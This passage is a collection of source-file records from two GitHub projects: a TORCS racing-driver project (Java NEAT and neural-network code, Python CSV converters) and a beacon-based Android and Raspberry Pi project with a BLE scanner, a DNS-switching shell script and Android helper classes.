values[1];\n\t\t}\n \taction.steering = values[2];\n \tSystem.out.print(action.accelerate + \" \");\n \tSystem.out.print(action.brake + \" \" );\n \tSystem.out.print(action.steering +\"\\n\");\n\t}\n\t\n\tprivate void indirectControl(Action action, SensorModel sensors) {\n\t\tthis.targetSpeed = Math.abs(this.speedNN.predict(sensors));\n\t\tthis.targetPosition = this.positionNN.predict(sensors);\n\t\tSystem.out.println(this.targetSpeed);\n\t\tdouble minSpeed = this.targetSpeed; //50;\n\t\tif (this.targetSpeed < minSpeed) {\n\t\t\tthis.targetSpeed = minSpeed;\n\t\t}\n\n\t\tSystem.out.println(\"Current Speed: \" + sensors.getSpeed());\n\t\tSystem.out.println(\"Target Speed: \" + this.targetSpeed);\n\t\tSystem.out.println(\"Current Pos: \" + sensors.getTrackPosition());\n\t\tSystem.out.println(\"Target Pos: \" + this.targetPosition);\n\t\t\n\t\tdouble steering = this.getSteering(sensors);\n\t\tboolean smooth = Math.abs(steering) < 0.15;\n\t\taction.accelerate = this.getAcceleration(sensors);\n \taction.brake = this.getBrake(sensors);\n \taction.steering = smooth ? 
0 : steering;\n \tSystem.out.print(action.accelerate + \" \");\n \tSystem.out.print(action.brake + \" \" );\n \tSystem.out.print(action.steering +\"\\n\");\n\t}\n}" }, { "alpha_fraction": 0.7186459302902222, "alphanum_fraction": 0.7225305438041687, "avg_line_length": 30.339130401611328, "blob_id": "8b00f51ba80dfdb0a8c1b63a6df058caf1d8677a", "content_id": "c4f650295c15c64c099358c4cb45a045f0666179", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3604, "license_type": "no_license", "max_line_length": 81, "num_lines": 115, "path": "/src/NEAT/NNPopulation.java", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "package NEAT;\nimport java.util.List;\nimport java.util.Vector;\nimport java.util.Comparator;\nimport java.util.LinkedList;\n\npublic class NNPopulation {\n\n\tprivate List<Species> species;\n\tprivate int populationSize;\n\t\n\tprivate static long innovationNumber = 0;\n\tprivate static final double sameSpeciesThreshold = 3.0;\n\t\n\tpublic NNPopulation() {\n\t\tthis.species = new LinkedList<Species>();\n\t}\n\t\n\tpublic void randomInitialize(int populationSize, int inputs, int outputs) {\n\t\tthis.populationSize = populationSize;\n\t\tNNGenome genome = new NNGenome(inputs, outputs);\n\t\tinnovationNumber = genome.getHighestInnovationNumber();\n\t\tSpecies firstSpecies = new Species();\n\t\tfirstSpecies.setRepresentative(genome);\n\t\tfor (int i = 0; i < populationSize; ++i) {\n\t\t\tfirstSpecies.addGenome(genome);\n\t\t}\n\t}\n\t\n\tpublic void epoch() {\n\t\t//create new species\n\t\tList<Species> newSpecies = new LinkedList<Species>();\n\t\tfor (Species species : this.species) {\n\t\t\tSpecies newSpecie = new Species();\n\t\t\tnewSpecie.setRepresentative(species.getRepresentative());\n\t\t\tnewSpecies.add(newSpecie);\n\t\t}\n\t\t//calculate number of offsprings and number of carried on individuals\n\t\tint carryOnIndividuals = this.calculateOffspringsPerSpecies();\n\t\t//carry on in the new species the best individuals from the previous population\n\t\tList<NNGenome> individuals = this.getBestIndividuals(carryOnIndividuals);\n\t\tfor (NNGenome individual : individuals) {\n\t\t\tthis.speciate(individual, newSpecies);\n\t\t}\n\t\t//produce offsprings from old species and add to new species\n\t\tfor (Species species : this.species) {\n\t\t\tList<NNGenome> offsprings = species.produceOffsprings();\n\t\t\tfor (NNGenome offspring : offsprings) {\n\t\t\t\tthis.speciate(offspring, newSpecies);\n\t\t\t}\n\t\t}\n\t\t//mutate new species\n\t\tfor (Species species : newSpecies) {\n\t\t\tspecies.mutateSpecies();\n\t\t}\n\t\t//set new species to be the species\n\t\tthis.species = newSpecies;\n\t}\n\t\n\tprivate int calculateOffspringsPerSpecies() {\n\t\tdouble[] speciesFitness = new double[this.species.size()];\n\t\tdouble fitnessSum = 0;\n\t\tint index = 0;\n\t\tfor (Species species : this.species) {\n\t\t\tspeciesFitness[index] = species.getFitness();\n\t\t\tfitnessSum += speciesFitness[index];\n\t\t\t++index;\n\t\t}\n\t\t\n\t\t//crossover produces only 75% of offsprings\n\t\tint totalOffsprings = 0;\n\t\tdouble precompute = 0.75 * (double)(this.populationSize) / fitnessSum;\n\t\tfor (int i = 0; i < speciesFitness.length; ++i) {\n\t\t\tint offsprings = (int) Math.round(precompute*speciesFitness[i]);\n\t\t\tthis.species.get(i).allowOffsprings(offsprings);\n\t\t\ttotalOffsprings += offsprings;\n\t\t}\n\t\treturn this.populationSize - totalOffsprings;\n\t}\n\t\n\tprivate List<NNGenome> getBestIndividuals(int count) 
{\n\t\tVector<NNGenome> individuals = new Vector<NNGenome>(this.populationSize);\n\t\tfor (Species species : this.species) {\n\t\t\tList<NNGenome> genomes = species.getGenomes();\n\t\t\tfor (NNGenome genome : genomes) {\n\t\t\t\tindividuals.add(genome);\n\t\t\t}\n\t\t}\n\t\tindividuals.sort(new Comparator<NNGenome>() {\n\t\t\t@Override\n\t\t\tpublic int compare(NNGenome left, NNGenome right) {\n\t\t\t\treturn (int) (right.getFitness() - left.getFitness());\n\t\t\t}\n\t\t});\n\t\treturn individuals.subList(0, count);\n\t}\n\t\n\tprivate void speciate(NNGenome network, List<Species> allSpecies) {\n\t\tboolean added = false;\n\t\tfor (Species species : allSpecies) {\n\t\t\tdouble compatibility = species.getCompatibility(network);\n\t\t\tif (compatibility < NNPopulation.sameSpeciesThreshold) {\n\t\t\t\tspecies.addGenome(network);\n\t\t\t\tadded = false;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif (!added) {\n\t\t\tSpecies newSpecies = new Species();\n\t\t\tnewSpecies.setRepresentative(network);\n\t\t\tnewSpecies.addGenome(network);\n\t\t\tallSpecies.add(newSpecies);\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.6284558176994324, "alphanum_fraction": 0.643290638923645, "avg_line_length": 26.98113250732422, "blob_id": "03d8a02a6393dee31274ca03086b7b053c87c1cd", "content_id": "3ce5ece14a6745043a3353a39897cadc5d0c7716", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1483, "license_type": "no_license", "max_line_length": 136, "num_lines": 53, "path": "/extractdata.py", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "import sys\n\ndesiredFields = {'speedX': 0, 'angle': 1, 'distFromStart': 2, 'track': 3, 'focus': 4, 'trackPos': 5, 'accel': 6, 'brake': 7, 'steer': 8}\n\ndef transformInput(line):\n if len(line) == 0:\n return None\n #else\n parsedFields = dict()\n inputs = line.strip('\\x00\\n').split('(')[1:]\n for field in inputs:\n splitField = field.strip().strip(')').split(' ')\n if splitField[0] in desiredFields:\n parsedFields[splitField[0]] = ','.join(splitField[1:])\n\n return parsedFields\n\ndef writeInOutFile(outFile, parsedFields):\n outputs = [None] * len(parsedFields)\n for key, value in parsedFields.iteritems():\n outputs[desiredFields[key]] = value\n outputString = ''\n for output in outputs:\n outputString += output + ','\n outFile.write(outputString.strip(',') + '\\n')\n\nif __name__ == '__main__':\n fileName = sys.argv[1]\n\n inFile = open(fileName , 'r')\n outFile = open(fileName[0:len(fileName)-4] + '.csv', 'w')\n\n lineNumber = 0\n parsedFields = dict()\n outFile.write(str(desiredFields) + '\\n')\n for line in inFile:\n if lineNumber < 2:\n lineNumber += 1\n continue\n\n curParsedFields = transformInput(line)\n if not curParsedFields:\n break\n for key, value in curParsedFields.iteritems():\n if key in desiredFields and key not in parsedFields:\n parsedFields[key] = value\n\n if len(parsedFields) == len(desiredFields):\n writeInOutFile(outFile, parsedFields)\n parsedFields.clear()\n\n inFile.close()\n outFile.close()\n" }, { "alpha_fraction": 0.6017699241638184, "alphanum_fraction": 0.6205752491950989, "avg_line_length": 22.789474487304688, "blob_id": "5b65e12836288c3d744efcc5483be6a5442d060b", "content_id": "f83d27d3c5ba8c3d3cbf90e078ba48d264c1cd13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 904, "license_type": "no_license", "max_line_length": 127, "num_lines": 38, "path": "/transformdata.py", "repo_name": "wbwvos/torcsproject2015", 
"src_encoding": "UTF-8", "text": "import sys\n\ndesiredFields = {'speedX': 0, 'angle': 1, 'distFromStart': 2, 'track': 3, 'focus': 4, 'trackPos': 5, 'speed': 6, 'trackPos': 7}\n\ndef transform(curLine, prevLine):\n outLine = prevLine[:len(curLine)-3]\n outLine.append(curLine[0]) #speed\n outLine.append(curLine[27]) #tracPos\n outFile.write(','.join(outLine) + '\\n') \n\nif __name__ == '__main__':\n fileName = sys.argv[1]\n\n inFile = open(fileName , 'r')\n outFile = open(fileName[:len(fileName)-4] + 'new.csv', 'w')\n\n lineNumber = 0\n parsedFields = dict()\n prevLine = None\n outFile.write(str(desiredFields) + '\\n')\n for line in inFile:\n if lineNumber < 1:\n lineNumber += 1\n continue\n\n curLine = line.strip('\\n').split(',')\n if prevLine == None:\n prevLine = curLine\n continue\n \n transform(curLine, prevLine)\n\n prevLine = curLine\n\n transform(prevLine, prevLine)\n\n inFile.close()\n outFile.close()\n" }, { "alpha_fraction": 0.6538240313529968, "alphanum_fraction": 0.6653249263763428, "avg_line_length": 26.571428298950195, "blob_id": "471ab668f31b6edcb8301a2cfedaa17e4584c995", "content_id": "8e5834f3e81439a4523e6acda0837444a0b9214a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1739, "license_type": "no_license", "max_line_length": 83, "num_lines": 63, "path": "/src/DefaultDriverGenome.java", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.ObjectInputStream;\n\nimport cicontest.torcs.genome.IGenome;\n//import trainNeuralNetwork.NeuralNetwork;\nimport trainNeuralNetwork.NeuralNetwork;\n\npublic class DefaultDriverGenome implements IGenome {\n\t\n private static final long serialVersionUID = 6534186543165341653L;\n \n private NeuralNetwork myNN;;\n \n private NeuralNetwork speedNN;\n private NeuralNetwork positionNN;\n \n public DefaultDriverGenome() {\n \tthis.myNN = deserializeNN(\"DefaultDriver3.ser\");\n this.speedNN = deserializeNN(\"speedNN.ser\");\n this.positionNN = deserializeNN(\"positionNN.ser\");\n }\n \n private NeuralNetwork NeatNN = deserializeNN(\"NEATDriver.ser\");\n \n public NeuralNetwork getMyNN() {\n return myNN;\n }\n \n public NeuralNetwork getSpeedNN() {\n \treturn this.speedNN;\n }\n \n public NeuralNetwork getPositionNN() {\n \treturn this.positionNN;\n }\n \n public NeuralNetwork getNeatNN() {\n \treturn this.NeatNN;\n }\n\n public static NeuralNetwork deserializeNN(String network){\n\t\ttry{\n\t\t\t FileInputStream fileIn = new FileInputStream(\"serialized networks/\" + network);\n\t ObjectInputStream in = new ObjectInputStream(fileIn);\n\t NeuralNetwork neuralnetwork = (NeuralNetwork) in.readObject();\n\t in.close();\n\t fileIn.close();\n\t System.out.println(\"Deserialized Neuralnetwork\");\n\t return neuralnetwork;\n\t }\n\t\tcatch(IOException i){\n\t i.printStackTrace();\n\t return null;\n\t }\n\t\tcatch(ClassNotFoundException c){\n\t System.out.println(\"Class not found\");\n\t c.printStackTrace();\n\t return null;\n\t }\n\t \n\t}\n}\n\n" } ]
6
marquavious/Data-Structures
https://github.com/marquavious/Data-Structures
e4b617ee915e35c1294cd4e982b13647f29e65d7
ff7aed7b50063979e2bd046badc5cbfd22d4e3ad
ce048747d9ef3c90863ca1652e32057e0f8be92e
refs/heads/master
2021-01-20T04:39:39.726967
2017-04-14T20:16:48
2017-04-14T20:16:48
85,622,436
0
0
null
2017-03-20T20:24:50
2017-03-20T19:52:02
2017-03-20T20:24:17
null
[ { "alpha_fraction": 0.761829674243927, "alphanum_fraction": 0.772870659828186, "avg_line_length": 47.769229888916016, "blob_id": "3d304efd3733a035e104630c06fdb6a4877a7258", "content_id": "a9ec159d145e57369d3d9895684e6169930109ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1904, "license_type": "no_license", "max_line_length": 119, "num_lines": 39, "path": "/Class12.md", "repo_name": "marquavious/Data-Structures", "src_encoding": "UTF-8", "text": "### Class 12: Friday, April 14 – Divide-and-Conquer Recursion\n\n**Topics:**\n- [divide-and-conquer]&nbsp;[recursion]: divide, conquer, combine\n- revisit [binary search] to see how it divides and conquers\n- [merge algorithm] and [merge sort]\n\n**Resources:**\n- play with USF's [interactive sorting animations] to follow algorithms step-by-step\n- watch Toptal's [sorting animations] to see how algorithms compare based on input data and read the discussion section\n- watch videos to observe patterns: [9 sorting algorithms], [15 sorting algorithms], [23 sorting algorithms]\n\n**Challenges:**\n- implement merge sort with a separate merge algorithm\n- annotate functions with complexity analysis\n- write unit tests for your sorting algorithms\n - include test cases of varying sizes and edge cases\n\n**Stretch Challenges:**\n- implement [bucket sort] for integers using a divide-and-conquer recursive style\n\n**Project:**\n- [sorting algorithms] with real-world data on Make School's Online Academy\n\n[divide-and-conquer]: https://en.wikipedia.org/wiki/Divide_and_conquer_algorithm\n[recursion]: https://en.wikipedia.org/wiki/Recursion_(computer_science)\n[binary search]: https://en.wikipedia.org/wiki/Binary_search_algorithm\n[merge algorithm]: https://en.wikipedia.org/wiki/Merge_algorithm\n[merge sort]: https://en.wikipedia.org/wiki/Merge_sort\n[bucket sort]: https://en.wikipedia.org/wiki/Bucket_sort\n\n[sorting animations]: https://www.toptal.com/developers/sorting-algorithms/\n[interactive sorting animations]: https://www.cs.usfca.edu/~galles/visualization/ComparisonSort.html\n[3 sorting algorithms]: https://www.youtube.com/watch?v=jHPexHsDxwQ\n[9 sorting algorithms]: https://www.youtube.com/watch?v=ZZuD6iUe3Pc\n[15 sorting algorithms]: https://www.youtube.com/watch?v=kPRA0W1kECg\n[23 sorting algorithms]: https://www.youtube.com/watch?v=rqI6KT6cOas\n\n[sorting algorithms]: http://make.sc/oa-sorting-algorithms\n" }, { "alpha_fraction": 0.670412003993988, "alphanum_fraction": 0.6779026389122009, "avg_line_length": 32.25, "blob_id": "12394066bc88ad1860c7260a66ccabd00d7f81ea", "content_id": "a824cdb2314042e71e9be47bc2f63fd9cf8ec015", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 267, "license_type": "no_license", "max_line_length": 113, "num_lines": 8, "path": "/source/sortsclassnine.py", "repo_name": "marquavious/Data-Structures", "src_encoding": "UTF-8", "text": "\ndef bubble_sort(array):\n input_array = array\n starter_index = 0\n next_index = 1\n\n\n if input_array[starter_index] > input_array[next_index]:\n input_array[starter_index], input_array[next_index] = input_array[next_index], input_array[starter_index]\n" } ]
2
marianmoldovan/cybercamp
https://github.com/marianmoldovan/cybercamp
791450f64a5502e4b57bf63d85b9c3daddec5320
016be69c39a190fb44e434630d5df84cde1c7bcf
838d5e5a4c0edbdef7a70ffdf2950afb0e0d133a
refs/heads/master
2020-06-07T06:47:11.675239
2014-12-07T07:03:24
2014-12-07T07:03:24
27,601,347
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7367303371429443, "alphanum_fraction": 0.747346043586731, "avg_line_length": 22.5, "blob_id": "c99cfd1cc499617720509566297c047d5049dc9b", "content_id": "463b5e9bd36a855be44dbf42c5b90666efc5ed2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 61, "num_lines": 20, "path": "/rpi blescan/test.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "import blescan\nimport sys\nimport bluetooth._bluetooth as bluez\nimport time\n\ndev_id = 0\ntry:\n\tsock = bluez.hci_open_dev(dev_id)\n\tprint \"ble thread started\"\nexcept:\n\tprint \"error accessing bluetooth device...\"\n\tsys.exit(1)\nblescan.hci_le_set_scan_parameters(sock)\nblescan.hci_enable_le_scan(sock)\nwhile True:\n\treturnedList = blescan.parse_events(sock, 10)\n\tnewlist = sorted(returnedList, key=lambda k: k['distance']) \n\tfor beacon in newlist:\n\t\tprint beacon\n\ttime.sleep(1)\n\n" }, { "alpha_fraction": 0.7109375, "alphanum_fraction": 0.73046875, "avg_line_length": 24.600000381469727, "blob_id": "9af9df2f394ee0f54354489c59f12bdde1edc40f", "content_id": "b0199ddf8c34f2f61ec5afa54ce09a49b9a9d603", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 256, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/Safe/beacons/src/main/java/com/beeva/beaconsutils/BluetoothNotActivatedException.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.beeva.beaconsutils;\n\n/**\n * Created by marianclaudiu on 5/11/14.\n */\npublic class BluetoothNotActivatedException extends Exception {\n public BluetoothNotActivatedException() {\n super(\"Bluetooth not activated on this device\");\n }\n}\n" }, { "alpha_fraction": 0.7322308421134949, "alphanum_fraction": 0.7375087738037109, "avg_line_length": 32.43529510498047, "blob_id": "dd9641747afdb3654dc1b3c81ac007fa1c81dedb", "content_id": "23a5dbb37ba139b430a35ab16557a10a6d88a922", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2842, "license_type": "no_license", "max_line_length": 172, "num_lines": 85, "path": "/Safe/beacons/src/main/java/com/beeva/beaconsutils/BeaconManager.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.beeva.beaconsutils;\n\nimport android.annotation.TargetApi;\nimport android.bluetooth.BluetoothAdapter;\nimport android.bluetooth.BluetoothManager;\nimport android.content.Context;\nimport android.content.pm.PackageManager;\nimport android.os.Build;\n\nimport java.util.Collection;\nimport java.util.List;\n\nimport uk.co.alt236.bluetoothlelib.device.IBeaconDevice;\n\n@TargetApi(Build.VERSION_CODES.JELLY_BEAN_MR2)\npublic abstract class BeaconManager {\n\n protected static final long SCAN_PERIOD = 5000;\n protected static final long PAUSE_PERIOD = 25000;\n\n private BeaconListener beaconListener;\n private Context context;\n\n private BluetoothManager bluetoothManager;\n private BluetoothAdapter bluetoothAdapter;\n\n public BeaconManager(Context context) throws BluetoothNotSuportedException, BluetoothLENotSuportedException, BluetoothNotActivatedException {\n if(!context.getPackageManager().hasSystemFeature(PackageManager.FEATURE_BLUETOOTH))\n throw new BluetoothNotSuportedException();\n this.context = context;\n bluetoothManager =(BluetoothManager) context.getSystemService(Context.BLUETOOTH_SERVICE);\n 
bluetoothAdapter = bluetoothManager.getAdapter();\n if (bluetoothAdapter == null)\n throw new BluetoothNotSuportedException();\n if (!bluetoothAdapter.isEnabled())\n throw new BluetoothNotActivatedException();\n if (Build.VERSION.SDK_INT < Build.VERSION_CODES.JELLY_BEAN_MR2 ||\n !context.getPackageManager().hasSystemFeature(PackageManager.FEATURE_BLUETOOTH_LE))\n throw new BluetoothLENotSuportedException();\n }\n\n public static BeaconManager createBeaconManager(Context context) throws BluetoothNotActivatedException, BluetoothLENotSuportedException, BluetoothNotSuportedException {\n if( Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP)\n return new BeaconManagerLollipop(context);\n else return new BeaconManagerJellyBean(context);\n }\n\n /**\n * Start periodicall scanning of Beacons\n */\n public abstract void startPeriodicallScan();\n\n /**\n * Start psingle scan of nearby Beacons. Scanning lasts for 5s.\n */\n\n public abstract void startSingleScan();\n\n public abstract void stopScanning();\n\n public abstract boolean isScanning();\n\n public abstract List<IBeaconDevice> getAllBeaconSeen();\n\n public Context getContext() {\n return context;\n }\n\n public BluetoothManager getBluetoothManager() {\n return bluetoothManager;\n }\n\n public BluetoothAdapter getBluetoothAdapter() {\n return bluetoothAdapter;\n }\n\n public BeaconListener getBeaconListener() {\n return beaconListener;\n }\n\n public void setBeaconListener(BeaconListener beaconListener) {\n this.beaconListener = beaconListener;\n }\n\n}\n" }, { "alpha_fraction": 0.6907962560653687, "alphanum_fraction": 0.7176835536956787, "avg_line_length": 18.73469352722168, "blob_id": "14ec0efa6a86a46f397edb91869945de1c55d9ca", "content_id": "b242501643be12348dd4e9569da1093a0cd461de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 967, "license_type": "no_license", "max_line_length": 59, "num_lines": 49, "path": "/changeDNS.sh", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfunction usage(){\n\techo \"<script name> [o|f]\"\n\t\techo\t\"-o starts the openDNS Server\"\n\t\techo \"-f stops the openDNS server\"\t\t\n}\n\nfunction startOpenDNS(){\n\techo \"Cambiando a OpenDNS\"\n\t\tsudo service hostapd stop\n\t\tsudo service isc-dhcp-server stop\n\t\tsudo cp /etc/dhcp/dhcpd-opendns.conf /etc/dhcp/dhcpd.conf\n\t\tsudo ifdown wlan0 && sudo ifup wlan0\n\t\tsudo ifconfig wlan0 192.168.42.1\n\t\tsudo service isc-dhcp-server start\n\t\tsudo service hostapd start\n\t\techo \"Cambio a OpenDNS realizado\"\n}\n\nfunction stopOpenDNS(){\n\techo \"Quitando el OpenDNS\"\n\t\tsudo service hostapd stop\n\t\tsudo service isc-dhcp-server stop\n\t\tsudo cp /etc/dhcp/dhcpd-normal.conf /etc/dhcp/dhcpd.conf\n\t\tsudo ifdown wlan0 && sudo ifup wlan0\n\t\tsudo ifconfig wlan0 192.168.42.1 \n\t\tsudo service isc-dhcp-server start\n\t\tsudo service hostapd start\n\t\techo \"OpenDNS apagado\"\n}\n\nwhile getopts \":of\" opts; do\ncase \"${opts}\" in\no)\nstartOpenDNS\n;;\nf)\nstopOpenDNS\n;;\n*)\nusage\nexit -1\n;;\nesac\ndone\n\n\nexit 0\n" }, { "alpha_fraction": 0.44999998807907104, "alphanum_fraction": 0.44999998807907104, "avg_line_length": 9, "blob_id": "ad2a7f5631f2cc446cf2a1b9400ad5a81178f8e8", "content_id": "775dd423dedc813d8e13598270f6bb8f7cde7cae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 20, "license_type": "no_license", "max_line_length": 9, "num_lines": 2, "path": "/README.md", 
"repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "cybercamp\n=========\n" }, { "alpha_fraction": 0.6337937116622925, "alphanum_fraction": 0.6391885876655579, "avg_line_length": 34.1136360168457, "blob_id": "1362fd96f38188da1260b6e5ca753af4eb70748e", "content_id": "00bbfb7ebe1e521b8c410ef48b7b1dad8407a50e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4634, "license_type": "no_license", "max_line_length": 107, "num_lines": 132, "path": "/Safe/app/src/main/java/com/gipsyz/safe/gcm/GcmRegisterActivity.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.gipsyz.safe.gcm;\n\nimport android.app.Activity;\nimport android.content.Context;\nimport android.content.SharedPreferences;\nimport android.os.AsyncTask;\nimport android.os.Build;\nimport android.os.Bundle;\nimport android.support.v7.app.ActionBarActivity;\nimport android.util.Log;\n\nimport com.gipsyz.safe.AppUtils;\nimport com.google.android.gms.common.ConnectionResult;\nimport com.google.android.gms.common.GooglePlayServicesUtil;\nimport com.google.android.gms.gcm.GoogleCloudMessaging;\nimport com.google.gson.JsonObject;\nimport com.koushikdutta.async.future.FutureCallback;\nimport com.koushikdutta.ion.Ion;\n\nimport java.io.IOException;\nimport java.util.concurrent.atomic.AtomicInteger;\n\n/**\n * Created by batman on 06/12/2014.\n */\npublic class GcmRegisterActivity extends Activity {\n\n public static final String EXTRA_MESSAGE = \"message\";\n public static final String PROPERTY_REG_ID = \"registration_id\";\n public static final String PROPERTY_DEVICE_ID = \"device_id\";\n private static final String PROPERTY_APP_VERSION = \"appVersion\";\n private final static int PLAY_SERVICES_RESOLUTION_REQUEST = 9000;\n\n GoogleCloudMessaging gcm;\n AtomicInteger msgId = new AtomicInteger();\n SharedPreferences prefs;\n String regid;\n\n @Override\n protected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n if (checkPlayServices()) {\n gcm = GoogleCloudMessaging.getInstance(this);\n regid = getRegistrationId();\n if (regid.isEmpty()) {\n registerInBackground();\n }\n } else {\n Log.i(AppUtils.TAG, \"No valid Google Play Services APK found.\");\n }\n }\n\n private boolean checkPlayServices() {\n int resultCode = GooglePlayServicesUtil.isGooglePlayServicesAvailable(this);\n if (resultCode != ConnectionResult.SUCCESS) {\n if (GooglePlayServicesUtil.isUserRecoverableError(resultCode)) {\n GooglePlayServicesUtil.getErrorDialog(resultCode, this,\n PLAY_SERVICES_RESOLUTION_REQUEST).show();\n } else {\n Log.i(AppUtils.TAG, \"This device is not supported.\");\n finish();\n }\n return false;\n }\n return true;\n }\n\n private String getRegistrationId() {\n final SharedPreferences prefs = getSharedPreferences(AppUtils.HIDDEN_PREFS, Context.MODE_PRIVATE);;\n String registrationId = prefs.getString(PROPERTY_REG_ID, \"\");\n if (registrationId.isEmpty()) {\n Log.i(AppUtils.TAG, \"Registration not found.\");\n return \"\";\n }\n // Check if app was updated; if so, it must clear the registration ID\n // since the existing regID is not guaranteed to work with the new\n // app version.\n int registeredVersion = prefs.getInt(PROPERTY_APP_VERSION, Integer.MIN_VALUE);\n int currentVersion = AppUtils.getAppVersion(this);\n if (registeredVersion != currentVersion) {\n Log.i(AppUtils.TAG, \"App version changed.\");\n return \"\";\n }\n return registrationId;\n }\n\n\n private void registerInBackground() {\n new 
RegisterAsync().execute((Void) null);\n }\n\n class RegisterAsync extends AsyncTask<Void, Void, String> {\n @Override\n protected String doInBackground(Void... params) {\n String msg = \"\";\n try {\n if (gcm == null) {\n gcm = GoogleCloudMessaging.getInstance(GcmRegisterActivity.this);\n }\n regid = gcm.register(\"687164714334\");\n msg = \"Device registered, registration ID=\" + regid;\n storeRegistrationData(regid);\n } catch (IOException ex) {\n msg = \"Error :\" + ex.getMessage();\n }\n return msg;\n }\n\n @Override\n protected void onPreExecute() {\n super.onPreExecute();\n }\n\n @Override\n protected void onPostExecute(String s) {\n super.onPostExecute(s);\n Log.i(AppUtils.TAG, s);\n }\n }\n\n private void storeRegistrationData(String regId) {\n final SharedPreferences prefs = getSharedPreferences(AppUtils.HIDDEN_PREFS, MODE_PRIVATE);\n int appVersion = AppUtils.getAppVersion(GcmRegisterActivity.this);\n Log.i(AppUtils.TAG, \"Saving regId on app version \" + appVersion);\n SharedPreferences.Editor editor = prefs.edit();\n editor.putString(PROPERTY_REG_ID, regId);\n editor.putInt(PROPERTY_APP_VERSION, appVersion);\n editor.commit();\n }\n\n\n}" }, { "alpha_fraction": 0.7086614370346069, "alphanum_fraction": 0.7283464670181274, "avg_line_length": 24.399999618530273, "blob_id": "970c68698e3665f3c35fcdb415eb5cf49684dcf8", "content_id": "c157fa33b6106ff4711f5daf3a273ad3a738d58e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 254, "license_type": "no_license", "max_line_length": 62, "num_lines": 10, "path": "/Safe/beacons/src/main/java/com/beeva/beaconsutils/BluetoothNotSuportedException.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.beeva.beaconsutils;\n\n/**\n * Created by marianclaudiu on 5/11/14.\n */\npublic class BluetoothNotSuportedException extends Exception {\n public BluetoothNotSuportedException() {\n super(\"Bluetooth not supported on this device\");\n }\n}\n" }, { "alpha_fraction": 0.5700325965881348, "alphanum_fraction": 0.5819761157035828, "avg_line_length": 17.058822631835938, "blob_id": "e57a68b833950dc153864af31020880c60d8d24a", "content_id": "7d7bff7851d9b16614e71d542eb41eb0b28e60c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 921, "license_type": "no_license", "max_line_length": 56, "num_lines": 51, "path": "/Safe/app/src/main/java/com/gipsyz/safe/dto/SimpleBeacon.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.gipsyz.safe.dto;\n\nimport uk.co.alt236.bluetoothlelib.device.IBeaconDevice;\n\n/**\n * Created by batman on 06/12/2014.\n */\npublic class SimpleBeacon {\n\n private String id;\n private String uuid;\n private int major, minor;\n\n public SimpleBeacon(IBeaconDevice device){\n this.uuid = device.getUUID();\n this.major = device.getMajor();\n this.minor = device.getMinor();\n }\n\n public String getUuid() {\n return uuid;\n }\n\n public void setUuid(String uuid) {\n this.uuid = uuid;\n }\n\n public int getMajor() {\n return major;\n }\n\n public void setMajor(int major) {\n this.major = major;\n }\n\n public int getMinor() {\n return minor;\n }\n\n public void setMinor(int minor) {\n this.minor = minor;\n }\n\n public String getId() {\n return id;\n }\n\n public void setId(String id) {\n this.id = id;\n }\n}\n" }, { "alpha_fraction": 0.6685823798179626, "alphanum_fraction": 0.6832695007324219, "avg_line_length": 34.59090805053711, "blob_id": 
"c2fb228831a4147ab67a3adb396482061f6067b7", "content_id": "9871b212e51c6f16d9bb534e9994be66f297bda4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1566, "license_type": "no_license", "max_line_length": 106, "num_lines": 44, "path": "/Safe/app/src/main/java/com/gipsyz/safe/AppUtils.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.gipsyz.safe;\n\nimport android.accounts.Account;\nimport android.accounts.AccountManager;\nimport android.app.ActivityManager;\nimport android.content.Context;\nimport android.content.pm.PackageInfo;\nimport android.content.pm.PackageManager;\nimport android.util.Patterns;\n\nimport java.util.regex.Pattern;\n\n/**\n * Created by batman on 06/12/2014.\n */\npublic class AppUtils {\n public final static String TAG = \"Safe\";\n public static final String HIDDEN_PREFS = \"hidden_prefs\";\n public static final String BASE_URL = \"http://192.168.1.147:8080\";\n public static final String OPEN_URL = BASE_URL + \"/open\";\n public static final String BEACON_URL = 